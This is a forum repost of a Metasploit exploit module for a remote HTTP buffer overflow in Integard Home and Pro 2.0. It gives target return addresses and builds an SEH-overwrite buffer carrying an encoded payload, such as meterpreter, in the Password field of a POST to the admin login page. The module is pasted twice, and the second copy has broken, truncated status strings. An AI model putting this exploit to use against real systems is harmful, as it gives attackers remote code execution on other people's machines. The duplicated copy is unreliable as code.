-
-
[推荐][转帖]Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit
-
发表于: 2010-9-9 10:41
-
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Integard Home/Pro version 2.0',
'Description' => %q{
Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
},
'Author' =>
[
'Lincoln',
'Nullthreat',
'rick2600',
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['URL','db8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4G2M7X3g2D9j5h3&6Q4x3X3g2T1k6g2)9K6b7e0R3^5x3o6m8Q4x3V1k6S2k6s2k6A6M7$3!0J5K9h3g2K6i4K6u0W2M7r3S2H3i4K6y4r3K9h3c8Q4x3@1c8o6e0#2u0q4e0p5q4z5i4K6u0V1x3e0m8Q4x3X3b7H3y4U0q4Q4x3U0N6Q4y4f1c8Q4x3V1y4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x20\x26\x2f\x3d\x3f\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Privileged' => false,
'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true }],
[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
[ 'Integard Pro 2.2.0.9026', { 'Ret' => 0x0040362C,}],
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(18881)
], self.class )
end
#Current version does not work with bind() type of payloads
#meterpreter, windows/exec etc works fine
def exploit
mytarget = target
if(target['auto'])
mytarget = nil
print_status(" Automatically detecting the target...")
connect
get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
sock.put(get)
data = sock.recv(1024)
if (data =~ /Content-Length: 24584/)
print_status("[!] Found Version - Integard Home")
mytarget = self.targets[1]
end
if (data =~ /Content-Length: 23196/)
print_status("[!] Found Version - Integard Pro")
mytarget = self.targets[2]
end
sock.close
end
connect
print_status("[!] Selected Target: #{mytarget.name}")
print_status(" Building Buffer")
pay = payload.encoded
junk = rand_text_alpha_upper(3091 - pay.length)
jmp = "\xE9\x2B\xF8\xFF\xFF"
nseh = "\xEB\xF9\x90\x90"
seh = [mytarget.ret].pack('V')
buffer = junk + pay + jmp + nseh + seh
print_status(" Sending Request")
req = "POST /LoginAdmin HTTP/1.1\r\n"
req << "Host: 192.168.2.129:18881\r\n"
req << "Content-Length: 1074\r\n\r\n"
req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
sock.put(req)
print_status(" Request Sent")
sock.close
handler
end
end
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Integard Home/Pro version 2.0',
'Description' => %q{
Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
},
'Author' =>
[
'Lincoln',
'Nullthreat',
'rick2600',
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['URL','db8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4G2M7X3g2D9j5h3&6Q4x3X3g2T1k6g2)9K6b7e0R3^5x3o6m8Q4x3V1k6S2k6s2k6A6M7$3!0J5K9h3g2K6i4K6u0W2M7r3S2H3i4K6y4r3K9h3c8Q4x3@1c8o6e0#2u0q4e0p5q4z5i4K6u0V1x3e0m8Q4x3X3b7H3y4U0q4Q4x3U0N6Q4y4f1c8Q4x3V1y4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x20\x26\x2f\x3d\x3f\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Privileged' => false,
'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true }],
[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
[ 'Integard Pro 2.2.0.9026', { 'Ret' => 0x0040362C,}],
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(18881)
], self.class )
end
#Current version does not work with bind() type of payloads
#meterpreter, windows/exec etc works fine
def exploit
mytarget = target
if(target['auto'])
mytarget = nil
print_status("
connect
get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
sock.put(get)
data = sock.recv(1024)
if (data =~ /Content-Length: 24584/)
print_status("[!] Found Version - Integard Home")
mytarget = self.targets[1]
end
if (data =~ /Content-Length: 23196/)
print_status("[!] Found Version - Integard Pro")
mytarget = self.targets[2]
end
sock.close
end
connect
print_status("[!] Selected Target: #{mytarget.name}")
print_status("
pay = payload.encoded
junk = rand_text_alpha_upper(3091 - pay.length)
jmp = "\xE9\x2B\xF8\xFF\xFF"
nseh = "\xEB\xF9\x90\x90"
seh = [mytarget.ret].pack('V')
buffer = junk + pay + jmp + nseh + seh
print_status("
req = "POST /LoginAdmin HTTP/1.1\r\n"
req << "Host: 192.168.2.129:18881\r\n"
req << "Content-Length: 1074\r\n\r\n"
req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
sock.put(req)
print_status("
sock.close
handler
end
end
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
